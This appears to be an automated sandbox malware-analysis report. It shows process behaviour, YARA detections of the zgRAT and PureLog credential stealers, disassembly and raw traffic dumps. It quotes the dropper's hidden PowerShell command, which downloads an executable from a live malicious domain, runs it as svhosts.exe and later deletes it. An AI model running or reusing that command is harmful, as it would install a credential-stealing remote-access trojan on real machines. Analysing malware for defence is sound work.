                                Data Ascii: hc m"`4 z0X9(HvVxaN7\,jI{{UB3Em~Cz[t5U[c?yvV:R4k"c4(xVYlk5Fa'CxHIx{EE\Fi]vEkZX=_s|ChBZ+(\\V.m=
                                2024-08-14 20:23:45 UTC16384INData Raw: 46 8b bb 03 bb f1 bf 4c a2 a0 c6 ff 16 e0 26 ec b4 7a ed 1a 6c fd d2 84 c6 fa a8 e4 54 97 3a 1a d8 ea 4c 56 87 2e fb c4 af 73 20 a1 f4 cc 5a 85 1d 82 34 6a 5a 5e 67 a6 f8 d9 47 28 e2 f8 9d 73 ea 57 9d 11 09 5b 9e 2a 75 2e 88 85 d7 8e 54 4b 5d b9 f7 7c b9 1b b5 5b c6 d1 6e 13 26 1c 36 e4 ac e9 60 44 b5 ec 2c 3c 6b 46 b2 b0 62 a8 e2 30 a8 b2 fa 77 d2 e4 5f 49 46 af 3b 7f b3 18 30 ae 30 cc 12 28 99 fc bf f0 49 4a eb 04 25 25 bb b6 be be c5 a5 65 86 4b e2 61 95 aa be cd 83 9b 26 03 b8 71 78 86 a9 01 53 ed 77 9d bb 4d 33 69 1f 8c b2 57 a8 c8 d3 a0 db b5 6b de b3 aa a3 cb 3a e9 4c 48 94 f2 81 a5 b3 5c 8b 35 71 5a b9 5f 65 15 d2 62 42 82 88 58 58 14 39 f2 44 19 3a 3e 78 3a 9b ee f5 77 05 a6 03 9a 59 c7 91 16 53 a9 08 f6 06 74 3a b4 95 6d f6 00 1a 0c 73 e7 78 94
                                Data Ascii: FL&zlT:LV.s Z4jZ^gG(sW[*u.TK]|[n&6`D,<kFb0w_IF;00(IJ%%eKa&qxSwM3iWk:LH\5qZ_ebBXX9D:>x:wYSt:msx
                                2024-08-14 20:23:45 UTC16384INData Raw: 87 d5 e3 bc 5b 37 dc a8 a4 87 64 0b 04 58 73 ad 74 0e e6 08 da f3 09 c7 0a b6 ed 03 d0 24 31 e3 2e af ae 2b 14 3d e7 ad 81 0e 69 92 78 d7 0d 6f 32 6b 68 75 01 77 8e eb 10 26 0b e5 5b 02 56 f2 a1 a9 50 b0 d9 6f 0f a8 86 c2 2e 3d 26 f4 e3 e3 c0 c6 e9 d0 3b 07 b4 b6 c7 9c a1 6c 88 65 05 b8 cd 88 da 21 47 71 2e ee 7e 9b 03 c1 ca 9f 77 44 e5 ba 12 1a e2 6e d7 25 71 2e 48 12 de 07 35 1e 19 df 32 22 69 3e f6 2d 6d 97 53 5a 1c 39 25 89 ac 07 97 37 5f f6 36 68 a8 28 3a 45 88 4e 25 cb 4e 0c 08 b9 ba 77 d5 9a 66 6d ad 94 bb 15 a7 e8 9a c4 cb 7d 3e f4 52 27 e4 57 ef 6c 2a f7 00 ba f5 94 57 80 76 86 5a c5 de 46 af 0e 16 43 30 67 39 88 4e 9a 0d 60 eb 50 d0 5a 56 f1 d1 ae 9b 82 9f 6e 6c 74 92 de 9f d8 9b dc 10 2c 4a ab 21 b5 2f d3 3e 67 8f 6b e5 7d 2d 2e 27 20 a5 c3 c0
                                Data Ascii: [7dXst$1.+=ixo2khuw&[VPo.=&;le!Gq.~wDn%q.H52"i>-mSZ9%7_6h(:EN%Nwfm}>R'Wl*WvZFC0g9N`PZVnlt,J!/>gk}-.'
                                2024-08-14 20:23:45 UTC16384INData Raw: 2e 88 56 0e 9c be e8 ac 81 8a f1 88 d6 fb 86 69 34 56 77 86 07 b3 66 d9 c4 a5 f8 5c 5c 9d d7 67 96 03 77 a3 8e e0 ad d1 fc d5 43 b0 56 d0 88 97 bc 13 24 c6 82 c1 21 d2 66 87 ac b2 13 54 60 de e2 5c 97 4a 1a 9a 4f 9c 5d a7 8d e3 e4 49 e6 66 81 bc 1b ee 2c 6a 42 3d dd ee 6a 80 9b 4d 36 17 eb 6b e4 57 32 fa c1 c8 d5 3f 92 cf 69 f3 82 77 7a b4 9c 5b 1f 86 a9 9f df 31 66 a4 50 77 b9 64 b9 67 db a1 34 96 66 8d a2 ab c0 c4 5f 95 b0 a5 41 77 7e 70 4b d9 50 ad a2 aa 0a 22 83 4d 35 92 a8 70 93 c9 ef 1d 46 9b 2f 3d 69 c7 00 ee 5e c5 d9 21 67 bf 9e 30 2f 91 6f 21 80 16 4d 26 2e 81 9f 95 d6 17 29 ed c6 ec b4 55 d6 33 cb b3 72 64 42 df 52 99 13 6b e3 a6 ca 29 7a 0e e5 92 3d b7 2f bd 79 94 24 25 a0 72 39 d9 77 87 48 62 b5 2e 65 7a c9 39 18 d5 c1 dc 40 0f e6 6a ad b9 93
                                Data Ascii: .Vi4Vwf\\gwCV$!fT`\JO]If,jB=jM6kW2?iwz[1fPwdg4f_Aw~pKP"M5pF/=i^!g0/o!M&.)U3rdBRk)z=/y$%r9wHb.ez9@j
                                2024-08-14 20:23:45 UTC16384INData Raw: 38 a1 7e bb f6 30 55 da 5a 2e ac 0a 2d 87 2c f4 b7 59 59 5f 69 21 d9 a1 ec 20 e2 c2 b8 8b a3 62 ba 80 36 24 86 d5 49 d9 c8 cd 7a af 51 8c 8c f3 bf 80 28 e1 28 ab ef af a3 75 77 0b b9 8e c0 a1 06 b9 f4 b9 4b 29 3c 1a 5d be 8a a5 2b 55 f4 49 15 7e c1 ca 74 f4 ff 41 07 22 b4 9a 8e 1a 8b af ae 58 01 04 61 d6 c7 39 75 bf bc 99 e1 1a e7 0a 02 df 14 50 4e 77 97 4b fa a8 b7 03 e0 01 7b a8 34 25 3d e1 5e b9 b8 64 b6 d5 98 49 6c f2 a3 59 cf a8 7f e3 6d 0c a1 b5 aa 9d 44 4b 70 00 c0 ae 73 07 92 67 75 c0 3b 19 16 d9 18 f6 5c a0 30 7a ec fc 68 42 27 27 7c 28 b6 b2 8b e8 ba 04 3d 3a f9 44 58 a1 b1 11 e2 76 8a b6 e0 d3 56 2f 28 ff 2b 60 ba e2 ea 79 ad 82 9f f5 30 79 d2 03 b2 c7 b6 56 f6 3d cc d9 e1 0c 59 ba 06 16 ee 5a 8e 6c 8c 0c f0 8f fa a4 f3 90 e3 af 02 e8 d3 aa d3
                                Data Ascii: 8~0UZ.-,YY_i! b6$IzQ((uwK)<]+UI~tA"Xa9uPNwK{4%=^dIlYmDKpsgu;\0zhB''|(=:DXvV/(+`y0yV=YZl


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:16:23:38
                                Start date:14/08/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:1
                                Start time:16:23:39
                                Start date:14/08/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:16:23:45
                                Start date:14/08/2024
                                Path:C:\Users\user\AppData\Roaming\svhosts.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Roaming\svhosts.exe"
                                Imagebase:0x450000
                                File size:861'184 bytes
                                MD5 hash:BD46789E8C6F46CC2D00FEA7E89F1F6F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2067785237.0000000000FD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2265623390.000000001B280000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 83%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:6
                                Start time:16:24:17
                                Start date:14/08/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell" Start-Sleep -Seconds 10; Remove-Item -Path 'C:\Users\user\AppData\Roaming\svhosts.exe' -Force
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:7
                                Start time:16:24:17
                                Start date:14/08/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Executed Functions

                                  Function 00007FFD9B970819 Relevance: .2, Instructions: 197COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1772325639.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b970000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f64823af071e1a964d5725a09f8e77323ca2acc6f75d73860bda4a1e370fa31
                                  • Instruction ID: 8e80abf303655130389ca592fb887e7eb2b1e4cf6cbaa3bd5f24e4cb4b35e61e
                                  • Opcode Fuzzy Hash: 5f64823af071e1a964d5725a09f8e77323ca2acc6f75d73860bda4a1e370fa31
                                  • Instruction Fuzzy Hash: 59512932B2EB4A5FFBA9976C54B26B973D1EF85710B0900BED45DC31E3ED19A8018381
                                  Function 00007FFD9B9708C6 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1772325639.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b970000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34d7c2698a4d4cbf8f22bb64527f91ee32c761c9d0404dd10d1fe4175a2f82a5
                                  • Instruction ID: d7e404718bc2dfc1e455e00a5bfcfd860538ceb2884148ad13555cc4617431be
                                  • Opcode Fuzzy Hash: 34d7c2698a4d4cbf8f22bb64527f91ee32c761c9d0404dd10d1fe4175a2f82a5
                                  • Instruction Fuzzy Hash: E311E132B2FA4A5FFBA897A854F16B9B3D1EF85750B5A00BED05DC31E3DD19A8018341
                                  Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1771900994.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45

                                  Execution Graph

                                  Execution Coverage:12.4%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:40.6%
                                  Total number of Nodes:32
                                  Total number of Limit Nodes:1
                                  execution_graph 21801 7ffd9ba220c3 21802 7ffd9ba220cb 21801->21802 21805 7ffd9ba22332 21802->21805 21808 7ffd9ba1e718 21802->21808 21804 7ffd9ba221ae 21813 7ffd9ba1e730 21804->21813 21807 7ffd9ba221c6 21809 7ffd9ba1e71d 21808->21809 21810 7ffd9ba22ece CryptUnprotectData 21809->21810 21811 7ffd9ba1e78c 21809->21811 21812 7ffd9ba22f36 21810->21812 21811->21804 21812->21804 21814 7ffd9ba1e735 21813->21814 21815 7ffd9ba22ece CryptUnprotectData 21814->21815 21817 7ffd9ba1e78c 21814->21817 21816 7ffd9ba22f36 21815->21816 21816->21807 21817->21807 21789 7ffd9ba22d15 21790 7ffd9ba22d2f CryptUnprotectData 21789->21790 21792 7ffd9ba22f36 21790->21792 21793 7ffd9ba215e5 21796 7ffd9ba1e668 21793->21796 21797 7ffd9ba21680 21796->21797 21798 7ffd9ba21605 21797->21798 21800 7ffd9ba1e698 CryptUnprotectData 21797->21800 21800->21798 21818 7ffd9b8a4c41 21823 7ffd9b8a4188 21818->21823 21820 7ffd9b8a4c63 21821 7ffd9b8a4188 VirtualProtect 21820->21821 21822 7ffd9b8aabc2 21821->21822 21823->21820 21825 7ffd9b8ad4a0 21823->21825 21824 7ffd9b8ad535 21824->21820 21825->21824 21826 7ffd9b8ad605 VirtualProtect 21825->21826 21827 7ffd9b8ad63e 21826->21827 21827->21820

                                  Executed Functions

                                  Function 00007FFD9B960F04 Relevance: 3.7, Strings: 1, Instructions: 2446COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: H
                                  • API String ID: 0-2852464175
                                  • Opcode ID: d34e13baa5484fe4c0c22dc5323b47fbbce9d6e8d4c49db3f14b26f200fd9d95
                                  • Instruction ID: d707e772913778f85f9050a492e86724c686d08d1bd2c3218e657ae1dc7d87e2
                                  • Opcode Fuzzy Hash: d34e13baa5484fe4c0c22dc5323b47fbbce9d6e8d4c49db3f14b26f200fd9d95
                                  • Instruction Fuzzy Hash: 13E2C512B2AE4F5FEBB9936C047523963C2EFD8645B5A41BAD45EC32F6ED19ED024300
                                  Function 00007FFD9BA1AE60 Relevance: 2.3, Strings: 1, Instructions: 1058COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 515 7ffd9ba1ae60-7ffd9ba383b6 517 7ffd9ba383c4 515->517 518 7ffd9ba383b8-7ffd9ba383c2 515->518 519 7ffd9ba383c9-7ffd9ba383cb 517->519 518->519 520 7ffd9ba38661-7ffd9ba38693 519->520 521 7ffd9ba383d1-7ffd9ba38419 call 7ffd9ba1ac30 519->521 535 7ffd9ba3869a-7ffd9ba38747 call 7ffd9ba31100 520->535 528 7ffd9ba38441-7ffd9ba38444 521->528 529 7ffd9ba3841b-7ffd9ba3842a 521->529 531 7ffd9ba38470-7ffd9ba38473 528->531 532 7ffd9ba38446-7ffd9ba3844c 528->532 529->528 533 7ffd9ba384c4-7ffd9ba384c7 531->533 534 7ffd9ba38475-7ffd9ba3847b 531->534 536 7ffd9ba3845f-7ffd9ba3846b 532->536 537 7ffd9ba3844e-7ffd9ba3845e 532->537 539 7ffd9ba3862f-7ffd9ba38660 call 7ffd9ba38170 533->539 540 7ffd9ba384cd-7ffd9ba384cf 533->540 541 7ffd9ba3848e-7ffd9ba384a0 534->541 542 7ffd9ba3847d-7ffd9ba3848d 534->542 576 7ffd9ba3874e-7ffd9ba3875f 535->576 577 7ffd9ba38749 535->577 536->539 537->536 544 7ffd9ba384e1-7ffd9ba384e7 540->544 545 7ffd9ba384d1-7ffd9ba384dc 540->545 557 7ffd9ba384b3-7ffd9ba384bf 541->557 558 7ffd9ba384a2-7ffd9ba384b2 541->558 542->541 550 7ffd9ba384fa-7ffd9ba38503 544->550 551 7ffd9ba384e9-7ffd9ba384f9 544->551 545->539 555 7ffd9ba38515 550->555 556 7ffd9ba38505-7ffd9ba38513 550->556 551->550 561 7ffd9ba3851a-7ffd9ba3851c 555->561 556->561 557->539 558->557 561->535 563 7ffd9ba38522-7ffd9ba3853e 561->563 570 7ffd9ba38545-7ffd9ba385d7 563->570 600 7ffd9ba385eb-7ffd9ba385f5 570->600 601 7ffd9ba385d9-7ffd9ba385e9 570->601 580 7ffd9ba38761 576->580 581 7ffd9ba38766-7ffd9ba3877d 576->581 577->576 579 7ffd9ba3874b 577->579 579->576 580->581 582 7ffd9ba38763 580->582 583 7ffd9ba3877f-7ffd9ba387f0 581->583 584 7ffd9ba3877e 581->584 582->581 592 7ffd9ba387f4-7ffd9ba38801 583->592 593 7ffd9ba387f2 583->593 584->583 594 7ffd9ba38808-7ffd9ba38859 592->594 593->594 607 7ffd9ba387f3 594->607 608 7ffd9ba3885b-7ffd9ba38c65 call 7ffd9ba37dd8 594->608 605 7ffd9ba385fb-7ffd9ba3862e 600->605 601->600 601->605 605->539 607->592 630 7ffd9ba38c6a-7ffd9ba38ca6 call 7ffd9ba1ad40 call 7ffd9ba1ad50 608->630 636 7ffd9ba38cb2-7ffd9ba38d4a call 7ffd9ba1ad98 call 7ffd9ba1ad90 call 7ffd9ba1a7e0 call 7ffd9ba1a4c8 630->636 637 7ffd9ba38ca8 630->637 637->636
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: <7^
                                  • API String ID: 0-2392494249
                                  • Opcode ID: 406ade255dabf351b147d09a2e533801d6d86bc526ff103e3923fb8b323f15d9
                                  • Instruction ID: 1028fa773d016e95452a0c0e139b090085a1ea9626d17e39eddb8748ac5bae70
                                  • Opcode Fuzzy Hash: 406ade255dabf351b147d09a2e533801d6d86bc526ff103e3923fb8b323f15d9
                                  • Instruction Fuzzy Hash: DE225831F0EA8A4FE7AA977888652B9BBE1FF55310F0501BED05DC31E7DE6869428341
                                  Function 00007FFD9BA1AB40 Relevance: 2.0, Strings: 1, Instructions: 704COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 648 7ffd9ba1ab40-7ffd9ba3aaef 651 7ffd9ba3ab00-7ffd9ba3ab03 call 7ffd9ba380d0 648->651 652 7ffd9ba3aaf1-7ffd9ba3aafe 648->652 655 7ffd9ba3ab08-7ffd9ba3ab47 call 7ffd9ba37e00 651->655 652->655 660 7ffd9ba3ab76 655->660 661 7ffd9ba3ab49-7ffd9ba3ab5a call 7ffd9ba37e00 655->661 663 7ffd9ba3ab7b-7ffd9ba3ab88 660->663 667 7ffd9ba3ab72-7ffd9ba3ab74 661->667 668 7ffd9ba3ab5c-7ffd9ba3ab70 661->668 665 7ffd9ba3ab91 663->665 666 7ffd9ba3ab8a-7ffd9ba3ab8f 663->666 669 7ffd9ba3ab96-7ffd9ba3aba2 665->669 666->669 667->663 668->663 670 7ffd9ba3aba4 669->670 671 7ffd9ba3aba9-7ffd9ba3abd8 call 7ffd9ba1ab28 669->671 670->671 675 7ffd9ba3abe4 671->675 676 7ffd9ba3abda-7ffd9ba3abe2 671->676 677 7ffd9ba3abec-7ffd9ba3ac12 675->677 676->677 681 7ffd9ba3ac1d-7ffd9ba3ac24 677->681 682 7ffd9ba3ac14 677->682 683 7ffd9ba3ac26-7ffd9ba3ac29 681->683 684 7ffd9ba3ac2b-7ffd9ba3ac40 call 7ffd9ba391a0 681->684 682->681 683->684 685 7ffd9ba3ac51-7ffd9ba3ac5f 683->685 687 7ffd9ba3ac45-7ffd9ba3ac4f call 7ffd9ba39130 684->687 691 7ffd9ba3ac61 685->691 692 7ffd9ba3ac69-7ffd9ba3ac92 685->692 687->692 691->692 693 7ffd9ba3aca4-7ffd9ba3acd2 call 7ffd9ba1ab38 692->693 694 7ffd9ba3ac94-7ffd9ba3ac9d 692->694 697 7ffd9ba3acde-7ffd9ba3ace5 693->697 698 7ffd9ba3acd4-7ffd9ba3acdc call 7ffd9ba1ab88 693->698 694->693 700 7ffd9ba3acf0-7ffd9ba3acf4 697->700 701 7ffd9ba3ace7-7ffd9ba3acee 697->701 702 7ffd9ba3acf8-7ffd9ba3acff 698->702 700->702 701->700 701->702 704 7ffd9ba3ad01-7ffd9ba3ad09 702->704 705 7ffd9ba3ad0b-7ffd9ba3ad1c call 7ffd9ba37d78 702->705 706 7ffd9ba3ad27-7ffd9ba3adc1 704->706 713 7ffd9ba3ad21 705->713 708 7ffd9ba3adc3 706->708 709 7ffd9ba3adeb-7ffd9ba3ae85 706->709 711 7ffd9ba3adc5-7ffd9ba3adce 708->711 712 7ffd9ba3ae88-7ffd9ba3ae90 709->712 714 7ffd9ba3add4-7ffd9ba3ade4 711->714 715 7ffd9ba3b0a1-7ffd9ba3b0b7 711->715 712->715 716 7ffd9ba3ae96-7ffd9ba3aea9 712->716 713->706 714->711 717 7ffd9ba3ade6 714->717 722 7ffd9ba3b0bf-7ffd9ba3b0c8 715->722 723 7ffd9ba3b0b9-7ffd9ba3b0bd 715->723 716->715 718 7ffd9ba3aeaf-7ffd9ba3aeca call 7ffd9ba1ab18 716->718 717->712 721 7ffd9ba3aecf-7ffd9ba3aee0 718->721 729 7ffd9ba3aee2-7ffd9ba3aee9 721->729 730 7ffd9ba3aeeb 721->730 724 7ffd9ba3b12b-7ffd9ba3b239 722->724 725 7ffd9ba3b0ca-7ffd9ba3b0fc 722->725 723->722 733 7ffd9ba3b0fe-7ffd9ba3b109 725->733 734 7ffd9ba3b10a-7ffd9ba3b10f 725->734 732 7ffd9ba3aeed-7ffd9ba3aef9 729->732 730->732 732->715 737 7ffd9ba3aeff-7ffd9ba3af11 732->737 734->724 736 7ffd9ba3b111-7ffd9ba3b12a 734->736 736->724 737->715 739 7ffd9ba3af17-7ffd9ba3af3c 737->739 743 7ffd9ba3af3e-7ffd9ba3af78 739->743 744 7ffd9ba3afb4-7ffd9ba3afbb 739->744 761 7ffd9ba3af9d-7ffd9ba3afb1 743->761 762 7ffd9ba3af7a-7ffd9ba3af9a 743->762 746 7ffd9ba3afbd-7ffd9ba3afe2 call 7ffd9ba39540 call 7ffd9ba39570 call 7ffd9ba39548 744->746 747 7ffd9ba3b00b-7ffd9ba3b018 call 7ffd9ba37e00 744->747 774 7ffd9ba3afef-7ffd9ba3affe 746->774 775 7ffd9ba3afe4-7ffd9ba3afed 746->775 754 7ffd9ba3b023-7ffd9ba3b03c 747->754 755 7ffd9ba3b01a-7ffd9ba3b021 747->755 769 7ffd9ba3b03e-7ffd9ba3b043 call 7ffd9ba39540 754->769 770 7ffd9ba3b048-7ffd9ba3b066 754->770 755->754 759 7ffd9ba3b067-7ffd9ba3b089 755->759 762->761 769->770 778 7ffd9ba3b004-7ffd9ba3b005 774->778 775->778 778->747
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: t3_H
                                  • API String ID: 0-2786081575
                                  • Opcode ID: 9189282cb7e0907f69b97f13b9d258fa7295c92d9429af6b79df9678d7c05eb4
                                  • Instruction ID: 1261a31010cbb0ffe9b4660629f07a69c36a17faf599fb338d045b9845073b7e
                                  • Opcode Fuzzy Hash: 9189282cb7e0907f69b97f13b9d258fa7295c92d9429af6b79df9678d7c05eb4
                                  • Instruction Fuzzy Hash: AA323530B0DA4E4FE768CB68C8A57F977D2EF95301F15457EE08AC32E6CA69A945C340
                                  Function 00007FFD9BA22D15 Relevance: 1.8, APIs: 1, Instructions: 316encryptionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID: CryptDataUnprotect
                                  • String ID:
                                  • API String ID: 834300711-0
                                  • Opcode ID: 5ed2648a7e11c410fcf9dfde05dcb2cfcf54e735ef76dc1346ee1b85c53b3340
                                  • Instruction ID: e23b34309d25ec7c7a811bc1ef607edc3b057a0c375541e2ecbce1c3051b531c
                                  • Opcode Fuzzy Hash: 5ed2648a7e11c410fcf9dfde05dcb2cfcf54e735ef76dc1346ee1b85c53b3340
                                  • Instruction Fuzzy Hash: 10A1E230A09A5C4FDBA9DF58D855BE8BBF0FF54310F0042AAD44DD7292CE74A986CB80
                                  Function 00007FFD9BA1E730 Relevance: 1.8, APIs: 1, Instructions: 307COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 083fb3d42dd0b37cf2d91fd2baa174a1b6921243091293d571227e7a0816513e
                                  • Instruction ID: d09c41a7ed3b9e35dd10fe8553986ae310be4137a46ab3b6cf393479eb3580b6
                                  • Opcode Fuzzy Hash: 083fb3d42dd0b37cf2d91fd2baa174a1b6921243091293d571227e7a0816513e
                                  • Instruction Fuzzy Hash: 21A1C471E08A1D8FEBA8DF58D855BE9B7F0FF58310F0041AAD44DD3292DE7469858B81
                                  Function 00007FFD9BA1E718 Relevance: 1.8, APIs: 1, Instructions: 300COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 950 7ffd9ba1e718-7ffd9ba1e741 956 7ffd9ba1e7a0-7ffd9ba24642 call 7ffd9ba23f70 950->956 957 7ffd9ba1e743-7ffd9ba1e762 950->957 975 7ffd9ba24644-7ffd9ba2464e 956->975 976 7ffd9ba24683-7ffd9ba2472a 956->976 963 7ffd9ba1e764-7ffd9ba22d85 957->963 964 7ffd9ba1e78c-7ffd9ba23506 call 7ffd9ba1e7b0 call 7ffd9ba1e7f0 call 7ffd9ba1e7a8 call 7ffd9ba1e7a0 957->964 972 7ffd9ba22dcf-7ffd9ba22e03 963->972 973 7ffd9ba22d87-7ffd9ba22e03 963->973 1025 7ffd9ba2350b-7ffd9ba2365a 964->1025 983 7ffd9ba22e0e-7ffd9ba22e27 972->983 973->983 975->976 980 7ffd9ba24650-7ffd9ba2465a 975->980 1007 7ffd9ba24734-7ffd9ba24741 976->1007 1008 7ffd9ba2472c-7ffd9ba24731 976->1008 980->976 984 7ffd9ba2465c-7ffd9ba24666 980->984 986 7ffd9ba22e29 983->986 987 7ffd9ba22e2b-7ffd9ba22e32 983->987 984->976 989 7ffd9ba24668-7ffd9ba24680 984->989 991 7ffd9ba22e34-7ffd9ba22e61 986->991 987->991 992 7ffd9ba22e68-7ffd9ba22e7f 987->992 989->976 991->992 998 7ffd9ba22ece-7ffd9ba22f34 CryptUnprotectData 992->998 999 7ffd9ba22e81-7ffd9ba22ecc 992->999 1001 7ffd9ba22f36 998->1001 1002 7ffd9ba22f3c-7ffd9ba22f5d 998->1002 999->998 1001->1002 1013 7ffd9ba22f80-7ffd9ba22ff6 call 7ffd9ba22ff7 1002->1013 1014 